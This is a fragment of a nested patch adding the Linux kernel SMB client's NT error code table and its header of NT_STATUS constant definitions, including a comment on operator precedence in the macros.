++	{"NT_STATUS_TOO_MANY_ADDRESSES", NT_STATUS_TOO_MANY_ADDRESSES},
++	{"NT_STATUS_ADDRESS_ALREADY_EXISTS",
++	 NT_STATUS_ADDRESS_ALREADY_EXISTS},
++	{"NT_STATUS_ADDRESS_CLOSED", NT_STATUS_ADDRESS_CLOSED},
++	{"NT_STATUS_CONNECTION_DISCONNECTED",
++	 NT_STATUS_CONNECTION_DISCONNECTED},
++	{"NT_STATUS_CONNECTION_RESET", NT_STATUS_CONNECTION_RESET},
++	{"NT_STATUS_TOO_MANY_NODES", NT_STATUS_TOO_MANY_NODES},
++	{"NT_STATUS_TRANSACTION_ABORTED", NT_STATUS_TRANSACTION_ABORTED},
++	{"NT_STATUS_TRANSACTION_TIMED_OUT",
++	 NT_STATUS_TRANSACTION_TIMED_OUT},
++	{"NT_STATUS_TRANSACTION_NO_RELEASE",
++	 NT_STATUS_TRANSACTION_NO_RELEASE},
++	{"NT_STATUS_TRANSACTION_NO_MATCH", NT_STATUS_TRANSACTION_NO_MATCH},
++	{"NT_STATUS_TRANSACTION_RESPONDED",
++	 NT_STATUS_TRANSACTION_RESPONDED},
++	{"NT_STATUS_TRANSACTION_INVALID_ID",
++	 NT_STATUS_TRANSACTION_INVALID_ID},
++	{"NT_STATUS_TRANSACTION_INVALID_TYPE",
++	 NT_STATUS_TRANSACTION_INVALID_TYPE},
++	{"NT_STATUS_NOT_SERVER_SESSION", NT_STATUS_NOT_SERVER_SESSION},
++	{"NT_STATUS_NOT_CLIENT_SESSION", NT_STATUS_NOT_CLIENT_SESSION},
++	{"NT_STATUS_CANNOT_LOAD_REGISTRY_FILE",
++	 NT_STATUS_CANNOT_LOAD_REGISTRY_FILE},
++	{"NT_STATUS_DEBUG_ATTACH_FAILED", NT_STATUS_DEBUG_ATTACH_FAILED},
++	{"NT_STATUS_SYSTEM_PROCESS_TERMINATED",
++	 NT_STATUS_SYSTEM_PROCESS_TERMINATED},
++	{"NT_STATUS_DATA_NOT_ACCEPTED", NT_STATUS_DATA_NOT_ACCEPTED},
++	{"NT_STATUS_NO_BROWSER_SERVERS_FOUND",
++	 NT_STATUS_NO_BROWSER_SERVERS_FOUND},
++	{"NT_STATUS_VDM_HARD_ERROR", NT_STATUS_VDM_HARD_ERROR},
++	{"NT_STATUS_DRIVER_CANCEL_TIMEOUT",
++	 NT_STATUS_DRIVER_CANCEL_TIMEOUT},
++	{"NT_STATUS_REPLY_MESSAGE_MISMATCH",
++	 NT_STATUS_REPLY_MESSAGE_MISMATCH},
++	{"NT_STATUS_MAPPED_ALIGNMENT", NT_STATUS_MAPPED_ALIGNMENT},
++	{"NT_STATUS_IMAGE_CHECKSUM_MISMATCH",
++	 NT_STATUS_IMAGE_CHECKSUM_MISMATCH},
++	{"NT_STATUS_LOST_WRITEBEHIND_DATA",
++	 NT_STATUS_LOST_WRITEBEHIND_DATA},
++	{"NT_STATUS_CLIENT_SERVER_PARAMETERS_INVALID",
++	 NT_STATUS_CLIENT_SERVER_PARAMETERS_INVALID},
++	{"NT_STATUS_PASSWORD_MUST_CHANGE", NT_STATUS_PASSWORD_MUST_CHANGE},
++	{"NT_STATUS_NOT_FOUND", NT_STATUS_NOT_FOUND},
++	{"NT_STATUS_NOT_TINY_STREAM", NT_STATUS_NOT_TINY_STREAM},
++	{"NT_STATUS_RECOVERY_FAILURE", NT_STATUS_RECOVERY_FAILURE},
++	{"NT_STATUS_STACK_OVERFLOW_READ", NT_STATUS_STACK_OVERFLOW_READ},
++	{"NT_STATUS_FAIL_CHECK", NT_STATUS_FAIL_CHECK},
++	{"NT_STATUS_DUPLICATE_OBJECTID", NT_STATUS_DUPLICATE_OBJECTID},
++	{"NT_STATUS_OBJECTID_EXISTS", NT_STATUS_OBJECTID_EXISTS},
++	{"NT_STATUS_CONVERT_TO_LARGE", NT_STATUS_CONVERT_TO_LARGE},
++	{"NT_STATUS_RETRY", NT_STATUS_RETRY},
++	{"NT_STATUS_FOUND_OUT_OF_SCOPE", NT_STATUS_FOUND_OUT_OF_SCOPE},
++	{"NT_STATUS_ALLOCATE_BUCKET", NT_STATUS_ALLOCATE_BUCKET},
++	{"NT_STATUS_PROPSET_NOT_FOUND", NT_STATUS_PROPSET_NOT_FOUND},
++	{"NT_STATUS_MARSHALL_OVERFLOW", NT_STATUS_MARSHALL_OVERFLOW},
++	{"NT_STATUS_INVALID_VARIANT", NT_STATUS_INVALID_VARIANT},
++	{"NT_STATUS_DOMAIN_CONTROLLER_NOT_FOUND",
++	 NT_STATUS_DOMAIN_CONTROLLER_NOT_FOUND},
++	{"NT_STATUS_ACCOUNT_LOCKED_OUT", NT_STATUS_ACCOUNT_LOCKED_OUT},
++	{"NT_STATUS_HANDLE_NOT_CLOSABLE", NT_STATUS_HANDLE_NOT_CLOSABLE},
++	{"NT_STATUS_CONNECTION_REFUSED", NT_STATUS_CONNECTION_REFUSED},
++	{"NT_STATUS_GRACEFUL_DISCONNECT", NT_STATUS_GRACEFUL_DISCONNECT},
++	{"NT_STATUS_ADDRESS_ALREADY_ASSOCIATED",
++	 NT_STATUS_ADDRESS_ALREADY_ASSOCIATED},
++	{"NT_STATUS_ADDRESS_NOT_ASSOCIATED",
++	 NT_STATUS_ADDRESS_NOT_ASSOCIATED},
++	{"NT_STATUS_CONNECTION_INVALID", NT_STATUS_CONNECTION_INVALID},
++	{"NT_STATUS_CONNECTION_ACTIVE", NT_STATUS_CONNECTION_ACTIVE},
++	{"NT_STATUS_NETWORK_UNREACHABLE", NT_STATUS_NETWORK_UNREACHABLE},
++	{"NT_STATUS_HOST_UNREACHABLE", NT_STATUS_HOST_UNREACHABLE},
++	{"NT_STATUS_PROTOCOL_UNREACHABLE", NT_STATUS_PROTOCOL_UNREACHABLE},
++	{"NT_STATUS_PORT_UNREACHABLE", NT_STATUS_PORT_UNREACHABLE},
++	{"NT_STATUS_REQUEST_ABORTED", NT_STATUS_REQUEST_ABORTED},
++	{"NT_STATUS_CONNECTION_ABORTED", NT_STATUS_CONNECTION_ABORTED},
++	{"NT_STATUS_BAD_COMPRESSION_BUFFER",
++	 NT_STATUS_BAD_COMPRESSION_BUFFER},
++	{"NT_STATUS_USER_MAPPED_FILE", NT_STATUS_USER_MAPPED_FILE},
++	{"NT_STATUS_AUDIT_FAILED", NT_STATUS_AUDIT_FAILED},
++	{"NT_STATUS_TIMER_RESOLUTION_NOT_SET",
++	 NT_STATUS_TIMER_RESOLUTION_NOT_SET},
++	{"NT_STATUS_CONNECTION_COUNT_LIMIT",
++	 NT_STATUS_CONNECTION_COUNT_LIMIT},
++	{"NT_STATUS_LOGIN_TIME_RESTRICTION",
++	 NT_STATUS_LOGIN_TIME_RESTRICTION},
++	{"NT_STATUS_LOGIN_WKSTA_RESTRICTION",
++	 NT_STATUS_LOGIN_WKSTA_RESTRICTION},
++	{"NT_STATUS_IMAGE_MP_UP_MISMATCH", NT_STATUS_IMAGE_MP_UP_MISMATCH},
++	{"NT_STATUS_INSUFFICIENT_LOGON_INFO",
++	 NT_STATUS_INSUFFICIENT_LOGON_INFO},
++	{"NT_STATUS_BAD_DLL_ENTRYPOINT", NT_STATUS_BAD_DLL_ENTRYPOINT},
++	{"NT_STATUS_BAD_SERVICE_ENTRYPOINT",
++	 NT_STATUS_BAD_SERVICE_ENTRYPOINT},
++	{"NT_STATUS_LPC_REPLY_LOST", NT_STATUS_LPC_REPLY_LOST},
++	{"NT_STATUS_IP_ADDRESS_CONFLICT1", NT_STATUS_IP_ADDRESS_CONFLICT1},
++	{"NT_STATUS_IP_ADDRESS_CONFLICT2", NT_STATUS_IP_ADDRESS_CONFLICT2},
++	{"NT_STATUS_REGISTRY_QUOTA_LIMIT", NT_STATUS_REGISTRY_QUOTA_LIMIT},
++	{"NT_STATUS_PATH_NOT_COVERED", NT_STATUS_PATH_NOT_COVERED},
++	{"NT_STATUS_NO_CALLBACK_ACTIVE", NT_STATUS_NO_CALLBACK_ACTIVE},
++	{"NT_STATUS_LICENSE_QUOTA_EXCEEDED",
++	 NT_STATUS_LICENSE_QUOTA_EXCEEDED},
++	{"NT_STATUS_PWD_TOO_SHORT", NT_STATUS_PWD_TOO_SHORT},
++	{"NT_STATUS_PWD_TOO_RECENT", NT_STATUS_PWD_TOO_RECENT},
++	{"NT_STATUS_PWD_HISTORY_CONFLICT", NT_STATUS_PWD_HISTORY_CONFLICT},
++	{"NT_STATUS_PLUGPLAY_NO_DEVICE", NT_STATUS_PLUGPLAY_NO_DEVICE},
++	{"NT_STATUS_UNSUPPORTED_COMPRESSION",
++	 NT_STATUS_UNSUPPORTED_COMPRESSION},
++	{"NT_STATUS_INVALID_HW_PROFILE", NT_STATUS_INVALID_HW_PROFILE},
++	{"NT_STATUS_INVALID_PLUGPLAY_DEVICE_PATH",
++	 NT_STATUS_INVALID_PLUGPLAY_DEVICE_PATH},
++	{"NT_STATUS_DRIVER_ORDINAL_NOT_FOUND",
++	 NT_STATUS_DRIVER_ORDINAL_NOT_FOUND},
++	{"NT_STATUS_DRIVER_ENTRYPOINT_NOT_FOUND",
++	 NT_STATUS_DRIVER_ENTRYPOINT_NOT_FOUND},
++	{"NT_STATUS_RESOURCE_NOT_OWNED", NT_STATUS_RESOURCE_NOT_OWNED},
++	{"NT_STATUS_TOO_MANY_LINKS", NT_STATUS_TOO_MANY_LINKS},
++	{"NT_STATUS_QUOTA_LIST_INCONSISTENT",
++	 NT_STATUS_QUOTA_LIST_INCONSISTENT},
++	{"NT_STATUS_FILE_IS_OFFLINE", NT_STATUS_FILE_IS_OFFLINE},
++	{"NT_STATUS_NO_MORE_ENTRIES", NT_STATUS_NO_MORE_ENTRIES},
++	{"NT_STATUS_MORE_ENTRIES", NT_STATUS_MORE_ENTRIES},
++	{"NT_STATUS_SOME_UNMAPPED", NT_STATUS_SOME_UNMAPPED},
++	{NULL, 0}
++};
+diff --git a/fs/smb/client/nterr.h b/fs/smb/client/nterr.h
+new file mode 100644
+index 0000000000000..edd4741cab0a1
+--- /dev/null
++++ b/fs/smb/client/nterr.h
+@@ -0,0 +1,551 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++   Unix SMB/Netbios implementation.
++   Version 1.9.
++   NT error code constants
++   Copyright (C) Andrew Tridgell              1992-2000
++   Copyright (C) John H Terpstra              1996-2000
++   Copyright (C) Luke Kenneth Casson Leighton 1996-2000
++   Copyright (C) Paul Ashton                  1998-2000
++
++*/
++
++#ifndef _NTERR_H
++#define _NTERR_H
++
++struct nt_err_code_struct {
++	char *nt_errstr;
++	__u32 nt_errcode;
++};
++
++extern const struct nt_err_code_struct nt_errs[];
++
++/* Win32 Status codes. */
++#define NT_STATUS_MORE_ENTRIES         0x0105
++#define NT_ERROR_INVALID_PARAMETER     0x0057
++#define NT_ERROR_INSUFFICIENT_BUFFER   0x007a
++#define NT_STATUS_1804                 0x070c
++#define NT_STATUS_NOTIFY_ENUM_DIR      0x010c
++
++/*
++ * Win32 Error codes extracted using a loop in smbclient then printing a netmon
++ * sniff to a file.
++ */
++
++#define NT_STATUS_OK                   0x0000
++#define NT_STATUS_SOME_UNMAPPED        0x0107
++#define NT_STATUS_BUFFER_OVERFLOW  0x80000005
++#define NT_STATUS_NO_MORE_ENTRIES  0x8000001a
++#define NT_STATUS_MEDIA_CHANGED    0x8000001c
++#define NT_STATUS_END_OF_MEDIA     0x8000001e
++#define NT_STATUS_MEDIA_CHECK      0x80000020
++#define NT_STATUS_NO_DATA_DETECTED 0x8000001c
++#define NT_STATUS_STOPPED_ON_SYMLINK 0x8000002d
++#define NT_STATUS_DEVICE_REQUIRES_CLEANING 0x80000288
++#define NT_STATUS_DEVICE_DOOR_OPEN 0x80000288
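++
++/*
++ * Editorial note: the definitions below compose the severity bits
++ * with the error number via an unparenthesised bitwise OR.  Since ==
++ * and != bind tighter than |, a bare "err != NT_STATUS_xxx" would
++ * parse as "(err != 0xC0000000) | 0xnnnn"; comparisons must wrap the
++ * macro in parentheses, as map_smb_to_linux_error() does with
++ * (NT_STATUS_MORE_PROCESSING_REQUIRED).
++ */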
++#define NT_STATUS_UNSUCCESSFUL 0xC0000000 | 0x0001
++#define NT_STATUS_NOT_IMPLEMENTED 0xC0000000 | 0x0002
++#define NT_STATUS_INVALID_INFO_CLASS 0xC0000000 | 0x0003
++#define NT_STATUS_INFO_LENGTH_MISMATCH 0xC0000000 | 0x0004
++#define NT_STATUS_ACCESS_VIOLATION 0xC0000000 | 0x0005
++#define NT_STATUS_IN_PAGE_ERROR 0xC0000000 | 0x0006
++#define NT_STATUS_PAGEFILE_QUOTA 0xC0000000 | 0x0007
++#define NT_STATUS_INVALID_HANDLE 0xC0000000 | 0x0008
++#define NT_STATUS_BAD_INITIAL_STACK 0xC0000000 | 0x0009
++#define NT_STATUS_BAD_INITIAL_PC 0xC0000000 | 0x000a
++#define NT_STATUS_INVALID_CID 0xC0000000 | 0x000b
++#define NT_STATUS_TIMER_NOT_CANCELED 0xC0000000 | 0x000c
++#define NT_STATUS_INVALID_PARAMETER 0xC0000000 | 0x000d
++#define NT_STATUS_NO_SUCH_DEVICE 0xC0000000 | 0x000e
++#define NT_STATUS_NO_SUCH_FILE 0xC0000000 | 0x000f
++#define NT_STATUS_INVALID_DEVICE_REQUEST 0xC0000000 | 0x0010
++#define NT_STATUS_END_OF_FILE 0xC0000000 | 0x0011
++#define NT_STATUS_WRONG_VOLUME 0xC0000000 | 0x0012
++#define NT_STATUS_NO_MEDIA_IN_DEVICE 0xC0000000 | 0x0013
++#define NT_STATUS_UNRECOGNIZED_MEDIA 0xC0000000 | 0x0014
++#define NT_STATUS_NONEXISTENT_SECTOR 0xC0000000 | 0x0015
++#define NT_STATUS_MORE_PROCESSING_REQUIRED 0xC0000000 | 0x0016
++#define NT_STATUS_NO_MEMORY 0xC0000000 | 0x0017
++#define NT_STATUS_CONFLICTING_ADDRESSES 0xC0000000 | 0x0018
++#define NT_STATUS_NOT_MAPPED_VIEW 0xC0000000 | 0x0019
++#define NT_STATUS_UNABLE_TO_FREE_VM 0x80000000 | 0x001a
++#define NT_STATUS_UNABLE_TO_DELETE_SECTION 0xC0000000 | 0x001b
++#define NT_STATUS_INVALID_SYSTEM_SERVICE 0xC0000000 | 0x001c
++#define NT_STATUS_ILLEGAL_INSTRUCTION 0xC0000000 | 0x001d
++#define NT_STATUS_INVALID_LOCK_SEQUENCE 0xC0000000 | 0x001e
++#define NT_STATUS_INVALID_VIEW_SIZE 0xC0000000 | 0x001f
++#define NT_STATUS_INVALID_FILE_FOR_SECTION 0xC0000000 | 0x0020
++#define NT_STATUS_ALREADY_COMMITTED 0xC0000000 | 0x0021
++#define NT_STATUS_ACCESS_DENIED 0xC0000000 | 0x0022
++#define NT_STATUS_BUFFER_TOO_SMALL 0xC0000000 | 0x0023
++#define NT_STATUS_OBJECT_TYPE_MISMATCH 0xC0000000 | 0x0024
++#define NT_STATUS_NONCONTINUABLE_EXCEPTION 0xC0000000 | 0x0025
++#define NT_STATUS_INVALID_DISPOSITION 0xC0000000 | 0x0026
++#define NT_STATUS_UNWIND 0xC0000000 | 0x0027
++#define NT_STATUS_BAD_STACK 0xC0000000 | 0x0028
++#define NT_STATUS_INVALID_UNWIND_TARGET 0xC0000000 | 0x0029
++#define NT_STATUS_NOT_LOCKED 0xC0000000 | 0x002a
++#define NT_STATUS_PARITY_ERROR 0xC0000000 | 0x002b
++#define NT_STATUS_UNABLE_TO_DECOMMIT_VM 0xC0000000 | 0x002c
++#define NT_STATUS_NOT_COMMITTED 0xC0000000 | 0x002d
++#define NT_STATUS_INVALID_PORT_ATTRIBUTES 0xC0000000 | 0x002e
++#define NT_STATUS_PORT_MESSAGE_TOO_LONG 0xC0000000 | 0x002f
++#define NT_STATUS_INVALID_PARAMETER_MIX 0xC0000000 | 0x0030
++#define NT_STATUS_INVALID_QUOTA_LOWER 0xC0000000 | 0x0031
++#define NT_STATUS_DISK_CORRUPT_ERROR 0xC0000000 | 0x0032
++#define NT_STATUS_OBJECT_NAME_INVALID 0xC0000000 | 0x0033
++#define NT_STATUS_OBJECT_NAME_NOT_FOUND 0xC0000000 | 0x0034
++#define NT_STATUS_OBJECT_NAME_COLLISION 0xC0000000 | 0x0035
++#define NT_STATUS_HANDLE_NOT_WAITABLE 0xC0000000 | 0x0036
++#define NT_STATUS_PORT_DISCONNECTED 0xC0000000 | 0x0037
++#define NT_STATUS_DEVICE_ALREADY_ATTACHED 0xC0000000 | 0x0038
++#define NT_STATUS_OBJECT_PATH_INVALID 0xC0000000 | 0x0039
++#define NT_STATUS_OBJECT_PATH_NOT_FOUND 0xC0000000 | 0x003a
++#define NT_STATUS_OBJECT_PATH_SYNTAX_BAD 0xC0000000 | 0x003b
++#define NT_STATUS_DATA_OVERRUN 0xC0000000 | 0x003c
++#define NT_STATUS_DATA_LATE_ERROR 0xC0000000 | 0x003d
++#define NT_STATUS_DATA_ERROR 0xC0000000 | 0x003e
++#define NT_STATUS_CRC_ERROR 0xC0000000 | 0x003f
++#define NT_STATUS_SECTION_TOO_BIG 0xC0000000 | 0x0040
++#define NT_STATUS_PORT_CONNECTION_REFUSED 0xC0000000 | 0x0041
++#define NT_STATUS_INVALID_PORT_HANDLE 0xC0000000 | 0x0042
++#define NT_STATUS_SHARING_VIOLATION 0xC0000000 | 0x0043
++#define NT_STATUS_QUOTA_EXCEEDED 0xC0000000 | 0x0044
++#define NT_STATUS_INVALID_PAGE_PROTECTION 0xC0000000 | 0x0045
++#define NT_STATUS_MUTANT_NOT_OWNED 0xC0000000 | 0x0046
++#define NT_STATUS_SEMAPHORE_LIMIT_EXCEEDED 0xC0000000 | 0x0047
++#define NT_STATUS_PORT_ALREADY_SET 0xC0000000 | 0x0048
++#define NT_STATUS_SECTION_NOT_IMAGE 0xC0000000 | 0x0049
++#define NT_STATUS_SUSPEND_COUNT_EXCEEDED 0xC0000000 | 0x004a
++#define NT_STATUS_THREAD_IS_TERMINATING 0xC0000000 | 0x004b
++#define NT_STATUS_BAD_WORKING_SET_LIMIT 0xC0000000 | 0x004c
++#define NT_STATUS_INCOMPATIBLE_FILE_MAP 0xC0000000 | 0x004d
++#define NT_STATUS_SECTION_PROTECTION 0xC0000000 | 0x004e
++#define NT_STATUS_EAS_NOT_SUPPORTED 0xC0000000 | 0x004f
++#define NT_STATUS_EA_TOO_LARGE 0xC0000000 | 0x0050
++#define NT_STATUS_NONEXISTENT_EA_ENTRY 0xC0000000 | 0x0051
++#define NT_STATUS_NO_EAS_ON_FILE 0xC0000000 | 0x0052
++#define NT_STATUS_EA_CORRUPT_ERROR 0xC0000000 | 0x0053
++#define NT_STATUS_FILE_LOCK_CONFLICT 0xC0000000 | 0x0054
++#define NT_STATUS_LOCK_NOT_GRANTED 0xC0000000 | 0x0055
++#define NT_STATUS_DELETE_PENDING 0xC0000000 | 0x0056
++#define NT_STATUS_CTL_FILE_NOT_SUPPORTED 0xC0000000 | 0x0057
++#define NT_STATUS_UNKNOWN_REVISION 0xC0000000 | 0x0058
++#define NT_STATUS_REVISION_MISMATCH 0xC0000000 | 0x0059
++#define NT_STATUS_INVALID_OWNER 0xC0000000 | 0x005a
++#define NT_STATUS_INVALID_PRIMARY_GROUP 0xC0000000 | 0x005b
++#define NT_STATUS_NO_IMPERSONATION_TOKEN 0xC0000000 | 0x005c
++#define NT_STATUS_CANT_DISABLE_MANDATORY 0xC0000000 | 0x005d
++#define NT_STATUS_NO_LOGON_SERVERS 0xC0000000 | 0x005e
++#define NT_STATUS_NO_SUCH_LOGON_SESSION 0xC0000000 | 0x005f
++#define NT_STATUS_NO_SUCH_PRIVILEGE 0xC0000000 | 0x0060
++#define NT_STATUS_PRIVILEGE_NOT_HELD 0xC0000000 | 0x0061
++#define NT_STATUS_INVALID_ACCOUNT_NAME 0xC0000000 | 0x0062
++#define NT_STATUS_USER_EXISTS 0xC0000000 | 0x0063
++#define NT_STATUS_NO_SUCH_USER 0xC0000000 | 0x0064
++#define NT_STATUS_GROUP_EXISTS 0xC0000000 | 0x0065
++#define NT_STATUS_NO_SUCH_GROUP 0xC0000000 | 0x0066
++#define NT_STATUS_MEMBER_IN_GROUP 0xC0000000 | 0x0067
++#define NT_STATUS_MEMBER_NOT_IN_GROUP 0xC0000000 | 0x0068
++#define NT_STATUS_LAST_ADMIN 0xC0000000 | 0x0069
++#define NT_STATUS_WRONG_PASSWORD 0xC0000000 | 0x006a
++#define NT_STATUS_ILL_FORMED_PASSWORD 0xC0000000 | 0x006b
++#define NT_STATUS_PASSWORD_RESTRICTION 0xC0000000 | 0x006c
++#define NT_STATUS_LOGON_FAILURE 0xC0000000 | 0x006d
++#define NT_STATUS_ACCOUNT_RESTRICTION 0xC0000000 | 0x006e
++#define NT_STATUS_INVALID_LOGON_HOURS 0xC0000000 | 0x006f
++#define NT_STATUS_INVALID_WORKSTATION 0xC0000000 | 0x0070
++#define NT_STATUS_PASSWORD_EXPIRED 0xC0000000 | 0x0071
++#define NT_STATUS_ACCOUNT_DISABLED 0xC0000000 | 0x0072
++#define NT_STATUS_NONE_MAPPED 0xC0000000 | 0x0073
++#define NT_STATUS_TOO_MANY_LUIDS_REQUESTED 0xC0000000 | 0x0074
++#define NT_STATUS_LUIDS_EXHAUSTED 0xC0000000 | 0x0075
++#define NT_STATUS_INVALID_SUB_AUTHORITY 0xC0000000 | 0x0076
++#define NT_STATUS_INVALID_ACL 0xC0000000 | 0x0077
++#define NT_STATUS_INVALID_SID 0xC0000000 | 0x0078
++#define NT_STATUS_INVALID_SECURITY_DESCR 0xC0000000 | 0x0079
++#define NT_STATUS_PROCEDURE_NOT_FOUND 0xC0000000 | 0x007a
++#define NT_STATUS_INVALID_IMAGE_FORMAT 0xC0000000 | 0x007b
++#define NT_STATUS_NO_TOKEN 0xC0000000 | 0x007c
++#define NT_STATUS_BAD_INHERITANCE_ACL 0xC0000000 | 0x007d
++#define NT_STATUS_RANGE_NOT_LOCKED 0xC0000000 | 0x007e
++#define NT_STATUS_DISK_FULL 0xC0000000 | 0x007f
++#define NT_STATUS_SERVER_DISABLED 0xC0000000 | 0x0080
++#define NT_STATUS_SERVER_NOT_DISABLED 0xC0000000 | 0x0081
++#define NT_STATUS_TOO_MANY_GUIDS_REQUESTED 0xC0000000 | 0x0082
++#define NT_STATUS_GUIDS_EXHAUSTED 0xC0000000 | 0x0083
++#define NT_STATUS_INVALID_ID_AUTHORITY 0xC0000000 | 0x0084
++#define NT_STATUS_AGENTS_EXHAUSTED 0xC0000000 | 0x0085
++#define NT_STATUS_INVALID_VOLUME_LABEL 0xC0000000 | 0x0086
++#define NT_STATUS_SECTION_NOT_EXTENDED 0xC0000000 | 0x0087
++#define NT_STATUS_NOT_MAPPED_DATA 0xC0000000 | 0x0088
++#define NT_STATUS_RESOURCE_DATA_NOT_FOUND 0xC0000000 | 0x0089
++#define NT_STATUS_RESOURCE_TYPE_NOT_FOUND 0xC0000000 | 0x008a
++#define NT_STATUS_RESOURCE_NAME_NOT_FOUND 0xC0000000 | 0x008b
++#define NT_STATUS_ARRAY_BOUNDS_EXCEEDED 0xC0000000 | 0x008c
++#define NT_STATUS_FLOAT_DENORMAL_OPERAND 0xC0000000 | 0x008d
++#define NT_STATUS_FLOAT_DIVIDE_BY_ZERO 0xC0000000 | 0x008e
++#define NT_STATUS_FLOAT_INEXACT_RESULT 0xC0000000 | 0x008f
++#define NT_STATUS_FLOAT_INVALID_OPERATION 0xC0000000 | 0x0090
++#define NT_STATUS_FLOAT_OVERFLOW 0xC0000000 | 0x0091
++#define NT_STATUS_FLOAT_STACK_CHECK 0xC0000000 | 0x0092
++#define NT_STATUS_FLOAT_UNDERFLOW 0xC0000000 | 0x0093
++#define NT_STATUS_INTEGER_DIVIDE_BY_ZERO 0xC0000000 | 0x0094
++#define NT_STATUS_INTEGER_OVERFLOW 0xC0000000 | 0x0095
++#define NT_STATUS_PRIVILEGED_INSTRUCTION 0xC0000000 | 0x0096
++#define NT_STATUS_TOO_MANY_PAGING_FILES 0xC0000000 | 0x0097
++#define NT_STATUS_FILE_INVALID 0xC0000000 | 0x0098
++#define NT_STATUS_ALLOTTED_SPACE_EXCEEDED 0xC0000000 | 0x0099
++#define NT_STATUS_INSUFFICIENT_RESOURCES 0xC0000000 | 0x009a
++#define NT_STATUS_DFS_EXIT_PATH_FOUND 0xC0000000 | 0x009b
++#define NT_STATUS_DEVICE_DATA_ERROR 0xC0000000 | 0x009c
++#define NT_STATUS_DEVICE_NOT_CONNECTED 0xC0000000 | 0x009d
++#define NT_STATUS_DEVICE_POWER_FAILURE 0xC0000000 | 0x009e
++#define NT_STATUS_FREE_VM_NOT_AT_BASE 0xC0000000 | 0x009f
++#define NT_STATUS_MEMORY_NOT_ALLOCATED 0xC0000000 | 0x00a0
++#define NT_STATUS_WORKING_SET_QUOTA 0xC0000000 | 0x00a1
++#define NT_STATUS_MEDIA_WRITE_PROTECTED 0xC0000000 | 0x00a2
++#define NT_STATUS_DEVICE_NOT_READY 0xC0000000 | 0x00a3
++#define NT_STATUS_INVALID_GROUP_ATTRIBUTES 0xC0000000 | 0x00a4
++#define NT_STATUS_BAD_IMPERSONATION_LEVEL 0xC0000000 | 0x00a5
++#define NT_STATUS_CANT_OPEN_ANONYMOUS 0xC0000000 | 0x00a6
++#define NT_STATUS_BAD_VALIDATION_CLASS 0xC0000000 | 0x00a7
++#define NT_STATUS_BAD_TOKEN_TYPE 0xC0000000 | 0x00a8
++#define NT_STATUS_BAD_MASTER_BOOT_RECORD 0xC0000000 | 0x00a9
++#define NT_STATUS_INSTRUCTION_MISALIGNMENT 0xC0000000 | 0x00aa
++#define NT_STATUS_INSTANCE_NOT_AVAILABLE 0xC0000000 | 0x00ab
++#define NT_STATUS_PIPE_NOT_AVAILABLE 0xC0000000 | 0x00ac
++#define NT_STATUS_INVALID_PIPE_STATE 0xC0000000 | 0x00ad
++#define NT_STATUS_PIPE_BUSY 0xC0000000 | 0x00ae
++#define NT_STATUS_ILLEGAL_FUNCTION 0xC0000000 | 0x00af
++#define NT_STATUS_PIPE_DISCONNECTED 0xC0000000 | 0x00b0
++#define NT_STATUS_PIPE_CLOSING 0xC0000000 | 0x00b1
++#define NT_STATUS_PIPE_CONNECTED 0xC0000000 | 0x00b2
++#define NT_STATUS_PIPE_LISTENING 0xC0000000 | 0x00b3
++#define NT_STATUS_INVALID_READ_MODE 0xC0000000 | 0x00b4
++#define NT_STATUS_IO_TIMEOUT 0xC0000000 | 0x00b5
++#define NT_STATUS_FILE_FORCED_CLOSED 0xC0000000 | 0x00b6
++#define NT_STATUS_PROFILING_NOT_STARTED 0xC0000000 | 0x00b7
++#define NT_STATUS_PROFILING_NOT_STOPPED 0xC0000000 | 0x00b8
++#define NT_STATUS_COULD_NOT_INTERPRET 0xC0000000 | 0x00b9
++#define NT_STATUS_FILE_IS_A_DIRECTORY 0xC0000000 | 0x00ba
++#define NT_STATUS_NOT_SUPPORTED 0xC0000000 | 0x00bb
++#define NT_STATUS_REMOTE_NOT_LISTENING 0xC0000000 | 0x00bc
++#define NT_STATUS_DUPLICATE_NAME 0xC0000000 | 0x00bd
++#define NT_STATUS_BAD_NETWORK_PATH 0xC0000000 | 0x00be
++#define NT_STATUS_NETWORK_BUSY 0xC0000000 | 0x00bf
++#define NT_STATUS_DEVICE_DOES_NOT_EXIST 0xC0000000 | 0x00c0
++#define NT_STATUS_TOO_MANY_COMMANDS 0xC0000000 | 0x00c1
++#define NT_STATUS_ADAPTER_HARDWARE_ERROR 0xC0000000 | 0x00c2
++#define NT_STATUS_INVALID_NETWORK_RESPONSE 0xC0000000 | 0x00c3
++#define NT_STATUS_UNEXPECTED_NETWORK_ERROR 0xC0000000 | 0x00c4
++#define NT_STATUS_BAD_REMOTE_ADAPTER 0xC0000000 | 0x00c5
++#define NT_STATUS_PRINT_QUEUE_FULL 0xC0000000 | 0x00c6
++#define NT_STATUS_NO_SPOOL_SPACE 0xC0000000 | 0x00c7
++#define NT_STATUS_PRINT_CANCELLED 0xC0000000 | 0x00c8
++#define NT_STATUS_NETWORK_NAME_DELETED 0xC0000000 | 0x00c9
++#define NT_STATUS_NETWORK_ACCESS_DENIED 0xC0000000 | 0x00ca
++#define NT_STATUS_BAD_DEVICE_TYPE 0xC0000000 | 0x00cb
++#define NT_STATUS_BAD_NETWORK_NAME 0xC0000000 | 0x00cc
++#define NT_STATUS_TOO_MANY_NAMES 0xC0000000 | 0x00cd
++#define NT_STATUS_TOO_MANY_SESSIONS 0xC0000000 | 0x00ce
++#define NT_STATUS_SHARING_PAUSED 0xC0000000 | 0x00cf
++#define NT_STATUS_REQUEST_NOT_ACCEPTED 0xC0000000 | 0x00d0
++#define NT_STATUS_REDIRECTOR_PAUSED 0xC0000000 | 0x00d1
++#define NT_STATUS_NET_WRITE_FAULT 0xC0000000 | 0x00d2
++#define NT_STATUS_PROFILING_AT_LIMIT 0xC0000000 | 0x00d3
++#define NT_STATUS_NOT_SAME_DEVICE 0xC0000000 | 0x00d4
++#define NT_STATUS_FILE_RENAMED 0xC0000000 | 0x00d5
++#define NT_STATUS_VIRTUAL_CIRCUIT_CLOSED 0xC0000000 | 0x00d6
++#define NT_STATUS_NO_SECURITY_ON_OBJECT 0xC0000000 | 0x00d7
++#define NT_STATUS_CANT_WAIT 0xC0000000 | 0x00d8
++#define NT_STATUS_PIPE_EMPTY 0xC0000000 | 0x00d9
++#define NT_STATUS_CANT_ACCESS_DOMAIN_INFO 0xC0000000 | 0x00da
++#define NT_STATUS_CANT_TERMINATE_SELF 0xC0000000 | 0x00db
++#define NT_STATUS_INVALID_SERVER_STATE 0xC0000000 | 0x00dc
